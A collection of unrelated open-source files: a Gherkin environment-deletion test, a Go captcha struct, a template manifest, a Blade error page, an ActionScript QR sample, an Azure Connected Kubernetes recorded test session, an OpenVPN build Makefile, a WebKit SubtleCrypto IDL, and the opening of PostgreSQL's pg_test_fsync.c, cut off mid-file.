Scenario: Delete an environment
Given I create an environment
When I delete the created environment
Then the delete environment response is valid
Scenario: Delete a non-existent environment
When I try to delete a non-existent environment named "non-existent"
Then there should be a ResourceNotFoundException thrown
And the resourceType is "environment"
And the resourceId contains "non-existent"
Scenario: Delete a deleted environment
Given I create an environment
When I delete the created environment
When I try to delete the environment
Then the delete environment response is valid
#TODO: Add invalid parameter tests
| {
"pile_set_name": "Github"
} |
// Copyright 2013 hanguofeng. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package gocaptcha
import (
"time"
)
// CaptchaInfo is the entity of a captcha.
// Text: the content text, rendered in the image and to be recognized by the user.
// CreateTime: the time when the captcha was created.
type CaptchaInfo struct {
Text string
CreateTime time.Time
ShownTimes int
}
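// --- Illustrative sketch, not part of the original library ---
// A minimal example of how a caller might construct a CaptchaInfo record;
// the helper name newCaptchaInfo is hypothetical and assumes the captcha
// text has already been generated elsewhere.
func newCaptchaInfo(text string) *CaptchaInfo {
	// Record the content text and the creation time; ShownTimes starts at zero.
	return &CaptchaInfo{
		Text:       text,
		CreateTime: time.Now(),
		ShownTimes: 0,
	}
}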
| {
"pile_set_name": "Github"
} |
{
"$schema": "http://json.schemastore.org/template",
"author": "Microsoft",
"classifications": ["Universal"],
"name": "Cosmos DB",
"shortName": "Cosmos DB",
"groupIdentity": "wts.Feature.Azure.Cosmos",
"identity": "wts.Feature.Azure.Cosmos.SQL",
"description": "Connect your web app to a distributed database service to access and query data using SQL or MongoDB API.",
"tags": {
"language": "Any",
"type": "item",
"wts.type": "feature",
"wts.platform": "Web",
"wts.projecttype": "FullStackWebApp",
"wts.frontendframework": "all",
"wts.backendframework": "all",
"wts.version": "1.0.0",
"wts.displayOrder": "1",
"wts.genGroup": "0",
"wts.rightClickEnabled": "true",
"wts.multipleInstance": "false",
"wts.group": "CloudDatabase"
},
"sourceName": "AzureCosmos",
"preferNameDirectory": true,
"PrimaryOutputs": [],
"symbols": {
"wts.rootNamespace": {
"type": "parameter",
"replaces": "Param_RootNamespace"
}
}
}
| {
"pile_set_name": "Github"
} |
@extends('layouts.error')
@section('title')
503
@endsection
@section('content')
<div class="title">503.</div>
<div class="title">Be right back.</div>
<div class="title">服务器君有点神游。</div>
@endsection
| {
"pile_set_name": "Github"
} |
package {
import com.d_project.qrcode.ErrorCorrectLevel;
import com.d_project.qrcode.QRCode;
import flash.display.Graphics;
import flash.display.Sprite;
public class QRCodeSample1 extends Sprite {
public function QRCodeSample1() {
var width : Number = 200;
var height : Number = 200;
var padding : Number = 10;
var size : Number = Math.min(width, height) - padding * 2;
var xOffset : Number = (width - size) / 2;
var yOffset : Number = (height - size) / 2;
var qr : QRCode = QRCode.getMinimumQRCode("AS3ならば、文字コードの扱いも簡単!", ErrorCorrectLevel.H);
var cs : Number = size / qr.getModuleCount();
var g : Graphics = graphics;
for (var row : int = 0; row < qr.getModuleCount(); row++) {
for (var col : int = 0; col < qr.getModuleCount(); col++) {
g.beginFill( (qr.isDark(row, col)? 0 : 0xffffff) );
g.drawRect(cs * col + xOffset, cs * row + yOffset, cs, cs);
g.endFill();
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
{
"Update-AzConnectedKubernetes+[NoContext]+UpdateExpanded+$PATCH+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+1": {
"Request": {
"Method": "PATCH",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": "{\n \"tags\": {\n \"key2\": \"2\",\n \"key1\": \"1\"\n }\n}",
"Headers": {
},
"ContentHeaders": {
"Content-Type": [ "application/json" ],
"Content-Length": [ "52" ]
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-writes": [ "1195" ],
"x-ms-request-id": [ "67eff90a-ec7a-4cc2-8d57-3473c952cbbd" ],
"x-ms-correlation-request-id": [ "0e541615-9aac-417c-b57b-a5f08d5a4219" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023028Z:0e541615-9aac-417c-b57b-a5f08d5a4219" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:27 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+2": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "33" ],
"x-ms-client-request-id": [ "d75273b2-e209-4b98-be78-0505515208c5" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11983" ],
"x-ms-request-id": [ "08dd5b32-46f9-412c-9edd-5f2562680fb4" ],
"x-ms-correlation-request-id": [ "4dcc53d5-8a6b-4f01-972c-efef7181131c" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023028Z:4dcc53d5-8a6b-4f01-972c-efef7181131c" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:28 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+1": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "34" ],
"x-ms-client-request-id": [ "8f6ef71a-473b-4d1b-810b-a5b5d7e46d61" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11982" ],
"x-ms-request-id": [ "64439cc2-030e-4e95-8a56-204f7b7fae37" ],
"x-ms-correlation-request-id": [ "11157ba1-149c-4e9e-a205-9752e833267f" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023029Z:11157ba1-149c-4e9e-a205-9752e833267f" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:28 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1265" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$PATCH+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+2": {
"Request": {
"Method": "PATCH",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": "{\n \"tags\": {\n \"key2\": \"2\",\n \"key1\": \"1\",\n \"key3\": \"3\"\n }\n}",
"Headers": {
},
"ContentHeaders": {
"Content-Type": [ "application/json" ],
"Content-Length": [ "69" ]
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-writes": [ "1194" ],
"x-ms-request-id": [ "aa3ae2a6-0ffd-4302-98e0-f7113da88c01" ],
"x-ms-correlation-request-id": [ "e2f430e8-b619-4801-bb4b-1d94f5149b8b" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023033Z:e2f430e8-b619-4801-bb4b-1d94f5149b8b" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:32 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1276" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\",\"key3\":\"3\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
},
"Update-AzConnectedKubernetes+[NoContext]+UpdateViaIdentityExpanded+$GET+https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview+3": {
"Request": {
"Method": "GET",
"RequestUri": "https://management.azure.com/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourcegroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb?api-version=2020-01-01-preview",
"Content": null,
"Headers": {
"x-ms-unique-id": [ "36" ],
"x-ms-client-request-id": [ "db0ce91f-1780-4150-9f9f-5616637f17ce" ],
"CommandName": [ "Get-AzConnectedKubernetes" ],
"FullCommandName": [ "Get-AzConnectedKubernetes_Get" ],
"ParameterSetName": [ "__AllParameterSets" ],
"User-Agent": [ "AzurePowershell/Az4.0.0-preview" ],
"Authorization": [ "[Filtered]" ]
},
"ContentHeaders": {
}
},
"Response": {
"StatusCode": 200,
"Headers": {
"Cache-Control": [ "no-cache" ],
"Pragma": [ "no-cache" ],
"x-ms-ratelimit-remaining-subscription-reads": [ "11981" ],
"x-ms-request-id": [ "5a61fd44-7494-48b2-a618-59fa538984e6" ],
"x-ms-correlation-request-id": [ "d1163bd2-6f2f-47c0-8bed-b1b81ddcca52" ],
"Server": [ "Kestrel" ],
"x-ms-routing-request-id": [ "SOUTHEASTASIA:20200615T023033Z:d1163bd2-6f2f-47c0-8bed-b1b81ddcca52" ],
"Strict-Transport-Security": [ "max-age=31536000; includeSubDomains" ],
"X-Content-Type-Options": [ "nosniff" ],
"Date": [ "Mon, 15 Jun 2020 02:30:32 GMT" ]
},
"ContentHeaders": {
"Content-Length": [ "1276" ],
"Content-Type": [ "application/json; charset=utf-8" ],
"Expires": [ "-1" ]
},
"Content": "{\"id\":\"/subscriptions/9e223dbe-3399-4e19-88eb-0975f02ac87f/resourceGroups/connaks-rg-576v9w/providers/Microsoft.Kubernetes/connectedClusters/connaks-deq5jb\",\"name\":\"connaks-deq5jb\",\"type\":\"Microsoft.Kubernetes/connectedClusters\",\"location\":\"eastus\",\"tags\":{\"key2\":\"2\",\"key1\":\"1\",\"key3\":\"3\"},\"identity\":{\"type\":\"SystemAssigned\",\"principalId\":\"d5cd956f-02f6-438e-bbd2-0fbf2345f0fb\",\"tenantId\":\"72f988bf-86f1-41af-91ab-2d7cd011db47\"},\"properties\":{\"provisioningState\":\"Succeeded\",\"agentPublicKeyCertificate\":\"MIICCgKCAgEAt6pHqmxsKsyoArEOEip33Ur3jKAvN53nOWB1Kjoxd/PnZCxaaesZIvdqEuX0K5AVdc+rTjrZE8ibLSEkzNtsjL4wncw8o0ze2sJ487eNrVebzJx3By3XEpTuGEbgDazvECrJtZxUZpiBKsQRFNuTArRF5dkFIyhHFKBbOTTyEjkXaFlI2Zyv3057jAnJL6txpJhxIu/lL2XDJCtVsQF8owpdVedAYroM1UxA6zcLOReHRdXfbbnChWBmog90Mgeyu1acWITGYnoAVi5vOts0P0kBF//YKVPXYqShegmWWzCwOQRWAg3KMkLrVUt66jUnYLpnhhHokdogbDcSNuT1KBCj16YGKWCcgXbWKBYR8sD2dYlIoAZsCnVScXTT5b65bRZBhW69p0jPjt4IgoArjB43hJb/kwEMh+GFE9ZSiS92qOyAWQ5WNEYimUH8lu3pvYIDoPZ2/eX6kz4Dv+pBPp251r5VJBRBvn3apLZ08QfgxjAnTgIJGOAt4Sz6g3ikmvdPHUPbPgEYymPBrxBIML8kOqL5LUeuMAA4i8B10NPU5AM7A0WJZX3TuQOyj5YNhhvztdVbAnbhPwSO1V3y6h9uv7ks27Krp7sLuLMIDangVb61hFkzI7Vm8WCgpSxrWVLSdx5z9dhtMoPdp5NZILUSiLsIuGfq9NpEGWgIZBUCAwEAAQ==\",\"aadProfile\":{\"tenantId\":\"\",\"clientAppId\":\"\",\"serverAppId\":\"\"}}}"
}
}
}
| {
"pile_set_name": "Github"
} |
SRC_NAME=openvpn-2.4.x
CFLAGS += -ffunction-sections -fdata-sections
LDFLAGS += -Wl,--gc-sections
all: config_test
$(MAKE) -C $(SRC_NAME)
config_test:
( if [ -f ./config_done ]; then \
echo "the same configuration"; \
else \
make configure && touch config_done; \
fi )
configure:
( cd $(SRC_NAME) ; \
autoreconf -vi ; \
IFCONFIG=/sbin/ifconfig \
ROUTE=/sbin/route \
NETSTAT=/bin/netstat \
./configure \
--prefix=/usr \
--disable-debug \
--disable-plugins \
--disable-pkcs11 \
--disable-ofb-cfb \
--disable-selinux \
--disable-systemd \
--disable-iproute2 \
--disable-management \
--disable-socks \
--enable-small \
--enable-multi \
--enable-server \
--enable-multihome \
--enable-pf \
--enable-fragment \
--enable-http-proxy \
--enable-def-auth \
--enable-ssl \
--enable-crypto \
--enable-lzo \
--with-crypto-library=openssl \
OPENSSL_CRYPTO_CFLAGS="-I$(STAGEDIR)/include" \
OPENSSL_CRYPTO_LIBS="-L$(STAGEDIR)/lib -lcrypto" \
OPENSSL_SSL_CFLAGS="-I$(STAGEDIR)/include" \
OPENSSL_SSL_LIBS="-L$(STAGEDIR)/lib -lssl -lcrypto" \
LZO_CFLAGS="-I$(STAGEDIR)/include" \
LZO_LIBS="-L$(STAGEDIR)/lib -llzo2" \
--with-sysroot=$(STAGEDIR) \
--host=$(HOST_TARGET) \
--build=$(HOST_BUILD) ; \
)
clean:
if [ -f $(SRC_NAME)/Makefile ] ; then \
$(MAKE) -C $(SRC_NAME) distclean ; \
fi ; \
rm -f config_done
romfs:
$(ROMFSINST) $(SRC_NAME)/src/openvpn/openvpn /usr/sbin/openvpn
$(ROMFSINST) /usr/bin/openvpn-cert.sh
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2016 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
* THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
* THE POSSIBILITY OF SUCH DAMAGE.
*/
enum KeyFormat { "raw", "spki", "pkcs8", "jwk" };
typedef (object or DOMString) AlgorithmIdentifier;
[
Conditional=WEB_CRYPTO,
Exposed=(Window,Worker),
GenerateIsReachable=ImplScriptExecutionContext,
] interface SubtleCrypto {
[CallWith=ExecState] Promise<any> encrypt(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> decrypt(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> sign(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource data);
[CallWith=ExecState] Promise<any> verify(AlgorithmIdentifier algorithm, CryptoKey key, BufferSource signature, BufferSource data);
[CallWith=ExecState] Promise<any> digest(AlgorithmIdentifier algorithm, BufferSource data);
[CallWith=ExecState] Promise<any> generateKey(AlgorithmIdentifier algorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
[CallWith=ExecState] Promise<any> deriveKey(AlgorithmIdentifier algorithm, CryptoKey baseKey, AlgorithmIdentifier derivedKeyType, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
[CallWith=ExecState] Promise<ArrayBuffer> deriveBits(AlgorithmIdentifier algorithm, CryptoKey baseKey, unsigned long length);
[CallWith=ExecState] Promise<CryptoKey> importKey(KeyFormat format, (BufferSource or JsonWebKey) keyData, AlgorithmIdentifier algorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
Promise<any> exportKey(KeyFormat format, CryptoKey key);
[CallWith=ExecState] Promise<any> wrapKey(KeyFormat format, CryptoKey key, CryptoKey wrappingKey, AlgorithmIdentifier wrapAlgorithm);
[CallWith=ExecState] Promise<CryptoKey> unwrapKey(KeyFormat format, BufferSource wrappedKey, CryptoKey unwrappingKey, AlgorithmIdentifier unwrapAlgorithm, AlgorithmIdentifier unwrappedKeyAlgorithm, boolean extractable, sequence<CryptoKeyUsage> keyUsages);
};
| {
"pile_set_name": "Github"
} |
/*
* pg_test_fsync.c
* tests all supported fsync() methods
*/
#include "postgres_fe.h"
#include <limits.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <time.h>
#include <unistd.h>
#include <signal.h>
#include "access/xlogdefs.h"
#include "common/logging.h"
#include "getopt_long.h"
/*
* put the temp files in the local directory
* unless the user specifies otherwise
*/
#define FSYNC_FILENAME "./pg_test_fsync.out"
#define XLOG_BLCKSZ_K (XLOG_BLCKSZ / 1024)
#define LABEL_FORMAT " %-30s"
#define NA_FORMAT "%21s\n"
/* translator: maintain alignment with NA_FORMAT */
#define OPS_FORMAT gettext_noop("%13.3f ops/sec %6.0f usecs/op\n")
#define USECS_SEC 1000000
/* These are macros to avoid timing the function call overhead. */
#ifndef WIN32
#define START_TIMER \
do { \
alarm_triggered = false; \
alarm(secs_per_test); \
gettimeofday(&start_t, NULL); \
} while (0)
#else
/* WIN32 doesn't support alarm, so we create a thread and sleep there */
#define START_TIMER \
do { \
alarm_triggered = false; \
if (CreateThread(NULL, 0, process_alarm, NULL, 0, NULL) == \
INVALID_HANDLE_VALUE) \
{ \
pg_log_error("could not create thread for alarm"); \
exit(1); \
} \
gettimeofday(&start_t, NULL); \
} while (0)
#endif
#define STOP_TIMER \
do { \
gettimeofday(&stop_t, NULL); \
print_elapse(start_t, stop_t, ops); \
} while (0)
static const char *progname;
static unsigned int secs_per_test = 5;
static int needs_unlink = 0;
static char full_buf[DEFAULT_XLOG_SEG_SIZE],
*buf,
*filename = FSYNC_FILENAME;
static struct timeval start_t,
stop_t;
static bool alarm_triggered = false;
static void handle_args(int argc, char *argv[]);
static void prepare_buf(void);
static void test_open(void);
static void test_non_sync(void);
static void test_sync(int writes_per_op);
static void test_open_syncs(void);
static void test_open_sync(const char *msg, int writes_size);
static void test_file_descriptor_sync(void);
#ifndef WIN32
static void process_alarm(int sig);
#else
static DWORD WINAPI process_alarm(LPVOID param);
#endif
static void signal_cleanup(int sig);
#ifdef HAVE_FSYNC_WRITETHROUGH
